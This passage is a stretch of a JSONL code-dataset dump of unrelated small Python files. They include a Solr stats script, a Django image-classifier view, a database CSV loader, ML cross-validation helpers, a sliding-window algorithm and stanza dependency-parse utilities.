","sub_path":"vig_attack.py","file_name":"vig_attack.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"322334667","text":"import requests\nimport json\n\n\ndef gather_solr_stats():\n r = requests.get(\"http://solr.api.wa.bl.uk/solr/admin/collections?action=CLUSTERSTATUS&wt=json\")\n\n collections = r.json()['cluster']['collections']\n for collection in collections:\n shards = collections[collection]['shards']\n for shard in shards:\n replicas = shards[shard]['replicas']\n for replica in replicas:\n core = replicas[replica]['core']\n base_url = replicas[replica]['base_url']\n status_url = f\"{base_url}/admin/cores?action=STATUS&core={core}&wt=json\"\n r = requests.get(status_url)\n stats = r.json()['status'][core]['index']\n stats['solr_collection'] = collection\n stats['solr_shard'] = shard\n stats['solr_replica'] = replica\n stats['solr_core'] = core\n stats['solr_base_url'] = base_url\n print(json.dumps(stats))\n\n\nif __name__ == '__main__':\n gather_solr_stats()","sub_path":"lib/windex/solr_stats.py","file_name":"solr_stats.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"535769439","text":"#!C:/Python36-32/python.exe\r\nfrom slicer import Slicer\r\nfrom content_reader import ContentReader\r\nfrom v_stacker import VStacker\r\nfrom paper_marker import Marker\r\nimport glob\r\n\r\nprint(\"content-type: text/plain\\n\\n\")\r\nquestions = [\"question1.jpg\", \"question2.jpg\"]\r\nnum_questions = 2\r\nfile_name = \"question1.jpg\"\r\n_obj = Slicer(file_name)\r\n_obj.create_dirs(2, [6, 5])\r\nprint(\"content-type: text/plain\\n\\n\")\r\nprint(\"Slicing The Paper...\")\r\nfor index in range(0, 2):\r\n file_name = questions[index]\r\n slicer_obj = Slicer(file_name)\r\n slicer_obj.execute_slicer(index + 1)\r\n\r\nimg_count = slicer_obj.get_image_count()\r\nprint(\"content-type: text/plain\\n\\n\")\r\nprint(\"Reading Content From The Paper\")\r\nreader_obj = ContentReader(img_count)\r\nquestion_num = 1\r\nreader_obj.execute_content_reader(question_num)\r\nprint(\"content-type: text/plain\\n\\n\")\r\nprint(\"Marking...\")\r\n\r\nscripts = glob.glob(\"Answer_Scripts/Processed/*.json\")\r\nvstacker = VStacker()\r\nfor script in scripts:\r\n marker_obj = Marker(\"memo/Math_Paper_1_Nov_2017/Memo_Paper_1_Math.json\")\r\n marks = marker_obj._mark(script, 0)\r\n vstacker.execute_vstacker(len(questions), marks)\r\n\r\nprint(\"content-type: text/plain\\n\\n\")\r\nprint(\"Finished Marking\")","sub_path":"Source_Code/Demo_2/Back_End/Marking Module/3_Phase_Marker/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"591287656","text":"# this populates the table\nimport csv\nimport psycopg2\n\nconnection = psycopg2.connect(\"dbname=learning_sql user=dbperson\")\n\ncursor = connection.cursor()\n\ncursor.execute(\"DROP TABLE IF EXISTS sports_data;\")\n\ntable_create_command = \"\"\"CREATE TABLE sports_data (\n rank NUMERIC (2),\n athlete VARCHAR (50),\n age NUMERIC (2),\n team VARCHAR (40),\n NOC VARCHAR (5),\n medal VARCHAR (12),\n t_time VARCHAR (10)\n);\"\"\"\n\ncursor.execute(table_create_command)\n# connection.commit()\n\nwith open(\"ski_stats\") as outfile:\n ski = csv.DictReader(outfile, fieldnames=[\"rank\", \"athlete\", \"age\", \"team\", \"NOC\", \"medal\", \"t_time\"])\n\n for row 
in ski:\n        print(row)\n        cursor.execute(\"INSERT INTO sports_data VALUES (%s, %s, %s, %s, %s, %s, %s);\",\n                       (int(row['rank']), row['athlete'],\n                        int(row['age']), row['team'], row['NOC'], row['medal'], row['t_time']))\n\nconnection.commit()\n\ncursor.close()\nconnection.close()","sub_path":"stats_migration.py","file_name":"stats_migration.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"199611499","text":"\"\"\"\nFor testing the code\n\"\"\"\n\ntrainMatrix = r'C:\\Users\\12391\\Desktop\\TextClassification-master\\matrix\\train\\matrix.pkl'\ntestMatrix = r'C:\\Users\\12391\\Desktop\\TextClassification-master\\matrix\\test\\matrix.pkl'\nimport joblib\nimport sklearn.decomposition\nimport numpy as np\n\n# print(joblib.load(trainMatrix).shape)\n# print(joblib.load(testMatrix).shape)\n\na = [\n\t[1,2,3],\n\t[2,2,4],\n\t[2,3,5]\n]\na = np.array(a)\n# print(a)\n\nb = sklearn.decomposition.TruncatedSVD(n_components=2)\nc = b.fit_transform(a)\n# b.transform(a)\nprint(b.components_)\nprint(b.explained_variance_)\nprint(b.explained_variance_ratio_)\nprint(b.singular_values_)\nprint(c)","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"288534279","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# In this program I take a radius from the user and compute the area of the circle with that radius\nradius = int(input(\" Please give the radius of your circle: \"))\n\narea = (22/7)*(radius)*(radius)\nprint (\"The area of your circle is: \" + str(area))\n\n\n# In[3]:\n\n\n# In this program I ask the user for a file name and report what its extension is.\nfile = input(\"Please give a file name: \")\nprint (file)\nvar = len(file)\ninc = 0\nwhile inc < var :\n    if file[inc] == \".\":\n        break\n    inc = inc+1\nprint(\"The file extension is : \" + file[inc+1:var])\n \n","sub_path":"Project_My_Captain.py","file_name":"Project_My_Captain.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"520389372","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom personal.models import ExampleModel\nfrom django.template import Template, Context\n\nimport cv2\nimport matplotlib.pyplot as plt\n\nfrom django import forms\n\nclass ImageUploadForm(forms.Form):\n\t\"\"\"Image upload form\"\"\"\n\timage = forms.ImageField()\n\n#/home/tensorflow/Desktop/Django/mysite/personal/pic_folder\ndef index(request):\n\t#return render(request, 'personal/home.html')\n\tif request.method == 'POST':\n\t\tform = ImageUploadForm(request.POST, request.FILES)\n\t\tif form.is_valid():\n\t\t\tm = ExampleModel()\n\t\t\t#m = ExampleModel.objects.get(pk=1)\n\t\t\tm.model_pic = form.cleaned_data['image']\n\t\t\tm.save()\n\t\t\tres = CatsDogs(m.model_pic.url)\n\n\t\t\t#output = cv2.imread('personal/output.jpg', cv2.IMREAD_GRAYSCALE)\n\t\t\twith open('personal/output.jpg', \"rb\") as f:\n\t\t\t\treturn HttpResponse(f.read(), content_type=\"image/png\")\n\n\treturn render(request, 'personal/home.html')\n\n'''\n\t\t\treturn render(request, 'personal/home.html', {'result':['You were classified as a', \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tstr(res[0]),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t' with probability = 
',\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tstr(res[1])]}\n\t\t\t\t\t\t)\n'''\n\t\t\t#return HttpResponse('You were classified as a ' + str(res[0]) + ' with probability = ' + str(res[1]) + ' !' )\n\n\t\n\ndef contact(request):\n\n\tif request.method == 'POST':\n\t\tform = ImageUploadForm(request.POST, request.FILES)\n\t\tif form.is_valid():\n\t\t\tm = ExampleModel()\n\t\t\t#m = ExampleModel.objects.get(pk=1)\n\t\t\tm.model_pic = form.cleaned_data['image']\n\t\t\tm.save()\n\t\t\t#res = CatsDogs(m.model_pic.url)\n\t\t\tres = CatsDogs(m.model_pic.url)\n\n\t\t\treturn HttpResponse('You were classified as a ' + str(res[0]) + ' with probability = ' + str(res[1]) + ' !' )\n\n\t\t\t#return HttpResponse(m.model_pic, content_type=\"image/png\")\n\n\treturn render(request, 'personal/basic.html')\n\n\n\ndef upload_pic(request):\n\n\tif request.method == 'POST':\n\t\tform = ImageUploadForm(request.POST, request.FILES)\n\t\tif form.is_valid():\n\t\t\tm = ExampleModel()\n\t\t\t#m = ExampleModel.objects.get(pk=1)\n\t\t\tm.model_pic = form.cleaned_data['image']\n\t\t\tm.save()\n\t\t\treturn HttpResponse(\"image upload success \")\n\n\treturn HttpResponse(\"allowed only via POST\")\n\n\n\ndef CatsDogs(pic_url):\n\t#import matplotlib.pyplot as plt\n\t#import cv2\n\timport numpy as np \n\timport os\n\tfrom random import shuffle\n\t#from tqdm import tqdm\n\n\timport tflearn\n\tfrom tflearn.layers.conv import conv_2d, max_pool_2d\n\tfrom tflearn.layers.core import input_data, dropout, fully_connected\n\tfrom tflearn.layers.estimator import regression\n\n\timport tensorflow as tf\n\timport pickle\n\n\n\tIMG_SIZE = 50\n\tLR = 1e-3\n\n\n\ttf.reset_default_graph()\n\n\tconvnet = input_data(shape=[None, IMG_SIZE, IMG_SIZE, 1], name='input')\n\n\tconvnet = conv_2d(convnet, 32, 2, activation='relu')\n\tconvnet = max_pool_2d(convnet, 2)\n\n\tconvnet = conv_2d(convnet, 64, 2, activation='relu')\n\tconvnet = max_pool_2d(convnet, 2)\n\n\tconvnet = conv_2d(convnet, 32, 2, activation='relu')\n\tconvnet = max_pool_2d(convnet, 2)\n\n\tconvnet = conv_2d(convnet, 64, 2, activation='relu')\n\tconvnet = max_pool_2d(convnet, 2)\n\n\tconvnet = conv_2d(convnet, 32, 2, activation='relu')\n\tconvnet = max_pool_2d(convnet, 2)\n\n\tconvnet = conv_2d(convnet, 64, 2, activation='relu')\n\tconvnet = max_pool_2d(convnet, 2)\n\n\tconvnet = fully_connected(convnet, 1024, activation='relu')\n\tconvnet = dropout(convnet, 0.8)\n\n\tconvnet = fully_connected(convnet, 2, activation='softmax')\n\tconvnet = regression(convnet, optimizer='adam', learning_rate=LR, loss='categorical_crossentropy', name='targets')\n\n\tmodel = tflearn.DNN(convnet, tensorboard_dir='log')\n\n\n\tmodel.load(\"personal/DogsCats_20Epochs.tfl\")\n\n\timg_ = cv2.imread(pic_url, cv2.IMREAD_GRAYSCALE) #[0]\n\n\timg = cv2.resize(img_, (IMG_SIZE, IMG_SIZE)) \n\n\tdata = img.reshape(IMG_SIZE, IMG_SIZE, 1)\n\n\tmodel_out = model.predict([data])[0]\n\n\tprint(model_out)\n\n\tif np.argmax(model_out) == 1: str_label='Dog'\n\telse: str_label='Cat'\n\n\n\tfig = plt.figure()\n\n\tif str_label=='Dog':\n\t\tprob = \"{0:.3f}\".format(model_out[1])\n\t\ttitle = 'The neural network classified you as a DOG with probability =' + str(prob)\n\telse:\n\t\tprob = \"{0:.3f}\".format(model_out[0])\n\t\ttitle = 'The neural network classified you as a CAT with probability =' + str(prob)\n\n\tfig.suptitle(title, fontsize=14, fontweight='bold')\n\ty = fig.add_subplot(1,2,1)\n\ty.imshow(img_, cmap='gray')\n\tplt.title('You were classified as a ' + 
str_label)\n\ty.axes.get_xaxis().set_visible(False)\n\ty.axes.get_yaxis().set_visible(False)\n\n\n\tif str_label=='Dog':\n\t\ttarget = model_out[1]\n\t\twith open('personal/predictionsdict_dog.pickle', 'rb') as handle:\n\t\t\tp_dict = pickle.load(handle)\n\telse:\n\t\ttarget = model_out[0]\n\t\twith open('personal/predictionsdict_cat.pickle', 'rb') as handle:\n\t\t\tp_dict = pickle.load(handle)\n\n\tmin_diff = 1\n\tkey_closest = 1\n\tfor k in p_dict:\n\t\tdiff = abs(p_dict[k] - target)\n\t\tif diff < min_diff:\n\t\t\tmin_diff = diff\n\t\t\tkey_closest = k\n\n\n\tclosest_url = '/home/tensorflow/Desktop/TensorFlow/dogs_cats_data/dogs_cats_test/test/' + str(key_closest) + '.jpg'\n\tclosest_img = cv2.imread(closest_url, cv2.IMREAD_GRAYSCALE)\n\t#cv2.imshow('test', closest_img_)\n\t#print (closest_url)\n\t#closest_img = cv2.resize(closest_img_, (IMG_SIZE, IMG_SIZE)) \n\n\ty = fig.add_subplot(1,2,2)\n\ty.imshow(closest_img, cmap='gray')\n\tplt.title(\"Just like it did - \")\n\ty.axes.get_xaxis().set_visible(False)\n\ty.axes.get_yaxis().set_visible(False)\n\n\t#plt.show()\n\tplt.savefig('personal/output.jpg')\n \t\n\n\n\tif str_label=='Dog':\n\t\treturn ['Dog', model_out[1]]\n\treturn ['Cat', model_out[0]] \n\n\n\n\n\n\n","sub_path":"Django/mysite/personal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"158744672","text":"from telebot import types\nimport sqlite3\n\n\nimport functions as func\n\nadmin = types.InlineKeyboardMarkup(row_width=2)\nadmin.add(\n types.InlineKeyboardButton('Рассылка',callback_data='message'),\n types.InlineKeyboardButton('Статистика', callback_data='statistics'),\n types.InlineKeyboardButton('Назад', callback_data='menu')\n)\n\nmenu = types.ReplyKeyboardMarkup(row_width=2, resize_keyboard=True)\nmenu.add(\n types.KeyboardButton('📡 Спасибо'),\n types.KeyboardButton('👤 За внимание'),\n types.KeyboardButton('⭐️ Тут кнопки меню')\n)\n","sub_path":"keyboard.py","file_name":"keyboard.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"206726128","text":"'''\nGiven two strings s and t of lengths m and n respectively, return the minimum window substring of s such that every character in t (including duplicates) is included in the window. 
If there is no such substring, return the empty string '.\n\nThe testcases will be generated such that the answer is unique.\n\nA substring is a contiguous sequence of characters within the string.\n'''\nfrom math import inf\nfrom time import time\n\n\nclass Solution:\n def minWindow(self, s: str, t: str) -> str:\n if len(s) < len(t):\n return ''\n\n window, t_map = {}, {}\n for c in t:\n t_map[c] = 1 + t_map.get(c, 0)\n\n # Track characters\n have, need = 0, len(t_map)\n p_window, minLen = [0, 0], inf\n l = 0\n for r in range(len(s)):\n c = s[r]\n window[c] = 1 + window.get(c, 0)\n\n if c in t_map and window[c] == t_map[c]:\n have += 1\n\n while have == need:\n if (r - l + 1) < minLen:\n p_window = [l, r]\n minLen = r - l + 1\n # Remove from window and increment left pointer\n window[s[l]] -= 1\n if s[l] in t_map and window[s[l]] < t_map[s[l]]:\n have -= 1\n l += 1\n\n l, r = p_window\n return s[l : r + 1] if minLen != inf else ''\n\n def reference(self, s: str, t: str) -> str:\n if t == '':\n return ''\n\n countT, window = {}, {}\n for c in t:\n countT[c] = 1 + countT.get(c, 0)\n\n have, need = 0, len(countT)\n res, resLen = [-1, -1], float('infinity')\n l = 0\n for r in range(len(s)):\n c = s[r]\n window[c] = 1 + window.get(c, 0)\n\n if c in countT and window[c] == countT[c]:\n have += 1\n\n while have == need:\n # Update our result\n if (r - l + 1) < resLen:\n res = [l, r]\n resLen = r - l + 1\n # Pop from the left of our window\n window[s[l]] -= 1\n if s[l] in countT and window[s[l]] < countT[s[l]]:\n have -= 1\n l += 1\n\n l, r = res\n return s[l : r + 1] if resLen != float('infinity') else ''\n\n def quantify(self, test_cases, runs=50000):\n sol_start = time()\n for i in range(runs):\n for case in test_cases:\n if i == 0:\n print(self.minWindow(*case))\n else:\n self.minWindow(*case)\n print(f'Runtime for our solution: {time() - sol_start}\\n')\n\n ref_start = time()\n for i in range(0, runs):\n for case in test_cases:\n if i == 0:\n print(self.reference(*case))\n else:\n self.reference(*case)\n print(f'Runtime for reference: {time() - ref_start}')\n\n\nif __name__ == '__main__':\n test = Solution()\n test_cases = [('ADOBECODEBANC', 'ABC'), ('a', 'a'), ('a', 'aa')]\n test.quantify(test_cases)\n","sub_path":"Blind 75/03 - Sliding Window/76-minimum-window-substring.py","file_name":"76-minimum-window-substring.py","file_ext":"py","file_size_in_byte":3117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"425381551","text":"import utils\nimport numpy as np\n\nboard_size = len(utils.rows)\n\ndef value_to_nparray(values):\n ret = np.zeros((board_size,board_size,board_size),dtype=bool)\n for r in range(len(utils.rows)):\n for c in range(len(utils.cols)):\n box_key = utils.rows[r]+utils.cols[c]\n box_value = values[box_key]\n for v in range(board_size):\n ret[r][c][v] = str(v+1) in box_value\n return ret\n\ndef nparray_to_value(nparray):\n ret = {}\n for r in range(len(utils.rows)):\n for c in range(len(utils.cols)):\n box_key = utils.rows[r]+utils.cols[c]\n nparray_ii = nparray[r][c]\n ret[box_key] = ''.join([str(i+1) for i in range(board_size) if nparray_ii[i]])\n return ret\n\nif __name__ == '__main__':\n import unittest\n import solution_test\n\n class SudokuConvertTest(unittest.TestCase):\n def test_value_to_nparray(self):\n diagonal_grid = '2.............62....1....7...6..8...3...9...7...6..4...4....8....52.............3'\n values = utils.grid_values(diagonal_grid)\n nparray = value_to_nparray(values)\n 
self.assertEqual(nparray[0][0][0],False)\n self.assertEqual(nparray[0][0][1],True)\n self.assertEqual(nparray[0][0][2],False)\n self.assertEqual(nparray[0][1][0],True)\n self.assertEqual(nparray[0][1][8],True)\n self.assertEqual(nparray[1][5][5],True)\n self.assertEqual(nparray[1][5][4],False)\n self.assertEqual(nparray[1][5][6],False)\n \n def test_nparray_to_value(self):\n diagonal_grid = '2.............62....1....7...6..8...3...9...7...6..4...4....8....52.............3'\n values = utils.grid_values(diagonal_grid)\n nparray = value_to_nparray(values)\n values0 = nparray_to_value(nparray)\n self.assertEqual(values,values0)\n\n unittest.main()\n","sub_path":"sudoku_convert.py","file_name":"sudoku_convert.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"114358244","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom implementations import *\n\n\"\"\" GENERAL FUNCTION \"\"\"\n\n# Sigmoid function that bring back x in the interval [0, 1]\ndef sigmoid(x):\n s = 0.5 * (1 + np.tanh(0.5*x))\n return s\n\n# Given a matrix 'x' and the degree, return the polynomial expansion of \n# the matrix.\ndef build_poly(x, degree):\n poly = x\n for deg in range(2, degree+1):\n poly = np.concatenate((poly, np.power(x, deg)), axis = 1)\n return poly\n\n# Given an array 'array', return a new array where the value -1 have\n# been replaced by zero.\ndef neg_to_zero(array):\n ret = np.zeros(len(array))\n for i, v in enumerate(array):\n if v == -1:\n ret[i] = 0\n else:\n ret[i] = v\n return ret\n\n# Given an array 'array', return a new array where the value zero have\n# been replaced by -1.\ndef zero_to_neg(array):\n ret = np.zeros(len(array))\n for i, v in enumerate(array):\n if v == 0:\n ret[i] = -1\n else:\n ret[i] = v\n return ret\n\n# Given train features and test features, return the standardized version\n# of those array.\ndef standardize(x_train, x_test):\n mean = np.mean(x_train)\n norm = np.linalg.norm(x_train)\n x_train_std = (x_train - mean)/norm\n x_test_std = (x_test - mean)/norm\n return x_train_std, x_test_std\n\n# Return the indices of the features of the array 'array' where the ratio\n# of values 'value' is greater than threshold.\ndef get_na_columns(array, threshold, value):\n na_indices = []\n for ind, row in enumerate(array.T):\n count_na = 0\n for j in range(len(row)):\n if row[j] == value:\n count_na += 1\n if (count_na/len(row)) > threshold:\n na_indices.append(ind)\n return na_indices\n\n# Given the array of features x, predict the undefined values of the\n# columns 'indices' of x, using least squares.\n# Return x with the predicted values instead of the undefined values,\n# and the models wi's used to find the predictions.\ndef predict_na_columns(x, indices):\n ws = []\n for i in indices:\n x_i_train, y_i_train, x_i_test, indices_to_drop_i, indices_to_keep_i = split_data(x, i, indices)\n w_i, loss_i = least_squares(y_i_train, x_i_train)\n y_i_test = x_i_test @ w_i\n y_i_arr = np.column_stack((indices_to_drop_i, y_i_test))\n x = put_back_y(x, i, y_i_arr)\n ws.append(w_i)\n return x, ws\n\n# Given the array of features x, and the model w, predict the undefined \n# values of the columns 'indices' of x.\n# Return x with the predicted values instead of the undefined values.\ndef set_predict_na_columns(x, w, indices):\n for i in indices:\n x_i_train, y_i_train, x_i_test, indices_to_drop_i, indices_to_keep_i = split_data(x, i, indices)\n y_i_test = x_i_test @ w\n y_i_arr = 
np.column_stack((indices_to_drop_i, y_i_test))\n x = put_back_y(x, i, y_i_arr)\n return x\n\n# Given a vector 'vect', return the indices to drop, corresponding to the\n# indices where the value is -999 in the vector and the indices to keep, \n# corresponding to the indices of the well defined values in the vector.\ndef get_indices(vect):\n indices_to_drop = []\n indices_to_keep = []\n for i, value in enumerate(vect):\n if value == int(-999):\n indices_to_drop.append(i)\n else:\n indices_to_keep.append(i)\n return indices_to_drop, indices_to_keep\n\n# Given a matrix 'array', the indice of a column and a vector 'y_fin',\n# replace the values of the columns by those of the vector 'y_fin'.\ndef put_back_y(array, ind_col, y_fin):\n for ind, pair in enumerate(y_fin):\n index, valeur = pair\n index = int(index)\n array[index][ind_col] = valeur \n return array\n\n# Given a matrix 'x', separate the array into x_train, x_test,\n# y_train, y_test, in order to predict the undefined values of the\n# matrix. It also returns the well defined value indices and the\n# undefined value indices.\ndef split_data(x, indice, indices):\n y = x.T[indice].T\n indices_to_drop_i, indices_to_keep_i = get_indices(y)\n y_i_train = np.take(y, indices_to_keep_i)\n x_train_tr = np.delete(x, indices, axis = 1)\n x_i_train = np.take(x_train_tr, indices_to_keep_i, axis = 0)\n x_i_test = np.take(x_train_tr, indices_to_drop_i, axis = 0)\n return x_i_train, y_i_train, x_i_test, indices_to_drop_i, indices_to_keep_i\n \n\"\"\" CROSS VALIDATION VIZUALIZATION\"\"\"\n\n# Displays the rmse of train and test set depending on the lambda.\ndef cross_validation_visualization(lambds, mse_tr, mse_te):\n plt.semilogx(lambds, mse_tr, marker=\".\", color='b', label='train error')\n plt.semilogx(lambds, mse_te, marker=\".\", color='r', label='test error')\n plt.xlabel(\"lambda\")\n plt.ylabel(\"rmse\")\n plt.title(\"cross validation\")\n plt.legend(loc=2)\n plt.grid(True)\n \n# Build k-indices for k-fold.\ndef build_k_indices(y, k_fold, seed):\n num_row = y.shape[0]\n interval = int(num_row / k_fold)\n np.random.seed(seed)\n indices = np.random.permutation(num_row)\n k_indices = [indices[k * interval: (k + 1) * interval] for k in range(k_fold)]\n return np.array(k_indices)\n\n# Return the loss of ridge regression.\ndef cross_validation(y, x, k_indices, k, lambda_, degree):\n # get k'th subgroup in test, others in train: TODO\n test_indices = k_indices[k]\n train_indices = np.concatenate((k_indices[:k], k_indices[k+1:])).flatten()\n \n x_train = x[train_indices]\n y_train = y[train_indices]\n x_test = x[test_indices]\n y_test = y[test_indices]\n \n # form data with polynomial degree: TODO\n m_train = build_poly(x_train, degree)\n m_test = build_poly(x_test, degree)\n \n # ridge regression: TODO\n w_train, loss_train = ridge_regression(y_train, m_train, lambda_)\n \n # calculate the loss for train and test data: TODO\n loss_tr = compute_mse(y_train, m_train, w_train)\n loss_te = compute_mse(y_test, m_test, w_train)\n\n return loss_tr, loss_te\n\n# Cross validation demo.\ndef cross_validation_demo(y, x, degree):\n seed = 1\n k_fold = 4\n lambdas = np.logspace(-12, 0, 30)\n \n # split data in k fold\n k_indices = build_k_indices(y, k_fold, seed)\n \n # define lists to store the loss of training data and test data\n rmse_tr = []\n rmse_te = []\n for lambda_ in lambdas:\n err_train = []\n err_test = []\n for k in range (k_fold):\n loss_tr, loss_te = cross_validation(y, x, k_indices, k, lambda_, degree) \n err_train.append(np.sqrt(2*loss_tr))\n 
err_test.append(np.sqrt(2*loss_te))\n rmse_tr.append(sum(err_train)/k_fold)\n rmse_te.append(sum(err_test)/k_fold)\n cross_validation_visualization(lambdas, rmse_tr, rmse_te)","sub_path":"Project 1/Polo/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":6756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"53103384","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom django.conf.urls import url\nfrom app import api,views\n\nurlpatterns = [\n path('', include('frontend.urls')),\n path('admin/', admin.site.urls),\n path('api/',include('app.urls')),\n path('api/login/', api.LoginAuthToken.as_view()),\n path('api/logout/', api.LogoutViewSet.as_view()),\n path('api/user/', api.UserView.as_view()),\n path('current/', api.UserView.as_view(), name='user-current'),\n path('upload/', api.FileUpload.as_view(), name ='file_upload')\n]\n","sub_path":"croc_app/croc_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"619960655","text":"def joint_number_(text_list): #match longer fraction such as ( 1 / 1000000 )\n #text_list='( | ( 5 / 7 ) - ( 1 / 14 ) + ( 5 / 6 ) ) / ( 5 / 42 ) .'.split(\" \")\n #text_list=\"计 ( 123 (1/10000) ) 算 ( 1 / 2 ) + ( 1 / 6 ) + ( 1 / 12 ) + ( 1 / 20 ) + … + ( 1 / 380 ) = 多 少 .\".split()\n text_list=\"苹 果 树 比 梨 树 少 ( 3 / 8 ) , 梨 树 比 苹 果 树 多 ( ( ( ) ) / ( ( ) ) )\".split(\" \")\n new_list=[]\n i=0\n while i < len(text_list):\n if text_list[i] == '(':\n try:\n j=text_list[i:].index(')')\n if i+1==i+j:\n j=None\n if \"(\" in text_list[i+1:i+j+1]:\n j=None\n except:\n j=None\n if j:\n stack=[]\n flag=True\n idx=0\n for temp_idx,word in enumerate(text_list[i:i+j+1]):\n if word in [\"(\",\")\",\"/\"] or word.isdigit():\n stack.append(word)\n idx=temp_idx\n else:\n flag=False\n break\n if \"/\" not in stack:\n flag=False\n if flag:\n number=''.join(stack)\n new_list.append(number)\n else:\n for word in stack:\n new_list.append(word)\n i+=idx+1\n else:\n new_list.append(text_list[i])\n i+=1\n else:\n new_list.append(text_list[i])\n i+=1\n return new_list\n#joint_number_([])\nfrom typing import Counter\nimport torch\nfrom torch import nn, stack\nfrom torch.nn import functional as F\nimport stanza\nimport copy\ndef get_group_num(doc,sent_len,num_pos):\n heads_deprel_upos=doc.get(['head','deprel','upos','text'])\n num_pos=[pos-sent_len for pos in num_pos]\n for idx,x in enumerate(heads_deprel_upos):\n print(idx,x)\n for n_pos in num_pos:\n pos_stack=[]\n group_num=[]\n #group_num.append(n_pos)\n pos_stack.append([n_pos,heads_deprel_upos[n_pos][1]])\n count=0\n head_pos=heads_deprel_upos[n_pos][0]\n head_dep=heads_deprel_upos[n_pos][1]\n for idx,x in enumerate(heads_deprel_upos):\n if heads_deprel_upos[idx][0]==head_pos and n_pos!=idx:\n deprel=heads_deprel_upos[idx][1]\n pos_stack.append([idx,deprel])\n while pos_stack:\n count+=1\n pos_dep=pos_stack.pop(0)\n pos=pos_dep[0]\n dep=pos_dep[1]\n head_pos=heads_deprel_upos[pos][0]-1\n upos=heads_deprel_upos[pos][2]\n if upos not in ['NOUN','NUM','ADJ','VERB','DET', 'SYM']:\n continue\n elif upos == 'NOUN' and dep not in ['compound','nsubj:pass','nsubj','compound']:\n continue\n elif upos == 'VERB' and dep not in ['conj','root']:\n continue\n elif upos == 'ADJ' and dep not in ['amod']:\n continue\n elif upos == 'DET' and dep not in ['advmod']:\n continue\n elif upos == 'SYM' and dep not in ['obl']:\n 
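Aside: a quick shape check of the column-wise polynomial expansion performed by build_poly in the functions.py record above; the data here is made up purely for illustration, and the loop mirrors the original helper rather than calling it.

    import numpy as np

    x = np.arange(6, dtype=float).reshape(3, 2)   # 3 samples, 2 features
    poly = x
    for deg in range(2, 4):                       # degree = 3
        poly = np.concatenate((poly, np.power(x, deg)), axis=1)
    assert poly.shape == (3, 6)                   # 2 features x 3 powers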
continue\n else:\n group_num.append(pos)\n if head_pos>=0:\n head_dep=heads_deprel_upos[head_pos][1]\n if [head_pos,head_dep] in pos_stack:\n pass\n else:\n pos_stack.append([head_pos,head_dep])\n print(count)\n print(group_num)\n return []\ndef get_group_num_(token_list,sent_len,num_pos):\n group_nums=[]\n num_pos=[pos-sent_len for pos in num_pos]\n for n_pos in num_pos:\n pos_stack=[]\n group_num=[]\n pos_stack.append([n_pos,token_list[n_pos][\"deprel\"]])\n count=0\n head_pos=token_list[n_pos]['head']\n for idx,x in enumerate(token_list):\n if x['head']==head_pos and n_pos!=idx:\n deprel=x[\"deprel\"]\n pos_stack.append([idx,deprel])\n while pos_stack:\n count+=1\n pos_dep=pos_stack.pop(0)\n pos=pos_dep[0]\n dep=pos_dep[1]\n head_pos=token_list[pos]['head']-1\n upos=token_list[pos]['upos']\n if upos not in ['NOUN','NUM','ADJ','VERB','DET', 'SYM']:\n continue\n elif upos == 'NOUN' and dep not in ['compound','nsubj:pass','nsubj','compound']:\n continue\n elif upos == 'VERB' and dep not in ['conj','root']:\n continue\n elif upos == 'ADJ' and dep not in ['amod']:\n continue\n elif upos == 'DET' and dep not in ['advmod']:\n continue\n elif upos == 'SYM' and dep not in ['obl']:\n continue\n else:\n group_num.append(pos+sent_len)\n if head_pos>=0:\n head_dep=token_list[head_pos]['deprel']\n if [head_pos,head_dep] in pos_stack:\n pass\n else:\n pos_stack.append([head_pos,head_dep])\n group_nums.append(group_num)\n return group_nums\n# nlp=stanza.Pipeline('en',processors='depparse,tokenize,pos,lemma',tokenize_pretokenized=True)\n# text=\"348 teddy bears are sold for $ 23 each . There are total 470 teddy bears in a store and the remaining teddy bears are sold for $ 17 each . How much did the store earn after selling all the teddy bears .\"\n# doc=nlp(text)\n# print(doc)\n# num_pos=[0, 7,13,28]\n# token_lists=doc.to_dict()\n# sentences=text.split(\".\")\n# sent_len=[]\n# num_pos=[0, 7,13,28]\n# num_pos_list=[]\n# last_pos_list=[]\n# l=0\n# for idx,sentence in enumerate(sentences):\n# sentence=sentence+' .'\n# sentences[idx]=sentence\n# sent_len.append(l)\n# l+=len(sentence.split(\" \"))\n# n_pos=[pos for pos in num_pos if pos random_nbr:\n print(\"\\033[1m Plus grand 